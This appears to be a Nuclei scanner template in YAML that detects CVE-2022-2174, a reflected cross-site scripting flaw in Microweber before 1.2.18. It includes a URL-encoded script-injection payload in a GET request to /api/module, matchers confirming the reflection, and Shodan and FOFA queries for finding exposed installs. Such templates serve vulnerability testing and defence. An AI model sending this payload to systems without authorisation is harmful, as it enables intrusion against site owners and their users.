48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2022-2174
|
|
|
|
info:
|
|
name: microweber 1.2.18 - Cross-site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
|
|
reference:
|
|
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
|
|
- https://www.tenable.com/cve/CVE-2022-2174
|
|
- https://github.com/microweber/microweber/commit/c51285f791e48e536111cd57a9544ccbf7f33961
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-2174
|
|
cwe-id: CWE-79
|
|
epss-score: 0.001
|
|
epss-percentile: 0.40832
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: microweber
|
|
product: microweber
|
|
shodan-query:
|
|
- http.favicon.hash:780351152
|
|
- http.html:"microweber"
|
|
fofa-query:
|
|
- body="microweber"
|
|
- icon_hash=780351152
|
|
tags: cve,cve2022,huntr,microweber,xss,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 500'
|
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
|
|
- 'contains(content_type, "text/html")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100f2014f47b7e4f20c289778b2ac1b0285d2b7566e8d3a8df8f1a1bd6860f006c5022100834238ffccb7ac91e050718f72cd5e8f4625e3d9d0341a498f0b7a6126782092:922c64590222798bb761d5b6d8e72950 |